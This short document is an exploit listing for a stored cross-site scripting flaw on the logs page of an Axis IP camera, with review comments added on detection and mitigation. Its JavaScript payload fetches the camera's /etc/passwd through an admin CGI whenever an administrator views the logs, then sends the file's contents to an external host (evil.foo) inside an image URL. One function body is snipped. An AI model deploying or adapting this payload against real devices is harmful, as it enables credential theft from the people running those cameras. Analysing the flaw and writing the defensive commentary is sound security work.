Owning big brother: persistent XSS on logs page on Axis IP camera
Steal passwd when admin checks logs
// xhrmagic.js - steals Axis 2100 passwd file
// (needs to be used in XSS attack to make it work)

// Shared request object read by processReqChange. It is never assigned in the
// visible lines; presumably the snipped loadXMLDoc body creates it.
var req;
// Path on the camera itself (no host, so it resolves against the page's origin).
// It asks the admin CGI for /etc/passwd through its `file` parameter.
// NOTE(review): the endpoint's behaviour is not shown here. If it serves any path it
// is given, that is what turns the logs-page XSS into disclosure of the password file;
// limiting the paths it accepts would reduce the impact.
var url="/admin-bin/editcgi.cgi?file=/etc/passwd";

// Body elided ("[snip]") in the original listing, so nothing about it can be stated as fact.
// NOTE(review): presumably it builds the request stored in `req`, registers
// processReqChange as its ready-state handler and sends a GET for `url` - confirm.
function loadXMLDoc(url) { [snip] }

// Ready-state callback for the request held in the global `req`.
// NOTE(review): presumably wired up inside the snipped loadXMLDoc - confirm.
// Why it matters to a defender: per the page title the script is stored in the camera's
// logs page, so it runs in the browser of whoever opens that page. A same-origin response
// is readable by page script, and this handler forwards it off the device.
function processReqChange() {
// readyState 4 means the request has finished
if (req.readyState == 4) {
// status 200 means the camera returned the requested content
if (req.status == 200) {
// The response body is appended to the query string of an image URL on an external
// host, so the browser sends it out as an ordinary GET.
// Detection: a request from the admin's workstation to an unfamiliar host carrying
// file content in the URL, visible in proxy or web-gateway logs.
// Mitigation: HTML-encode log entries before the logs page renders them, so stored
// markup is displayed as text and no script runs when the admin views the logs.
C=new Image();
C.src="http://evil.foo/chivato.php?target="+req.responseText;
}
}
// The closing brace of processReqChange shares its line with the top-level call that starts the request.
} loadXMLDoc(url);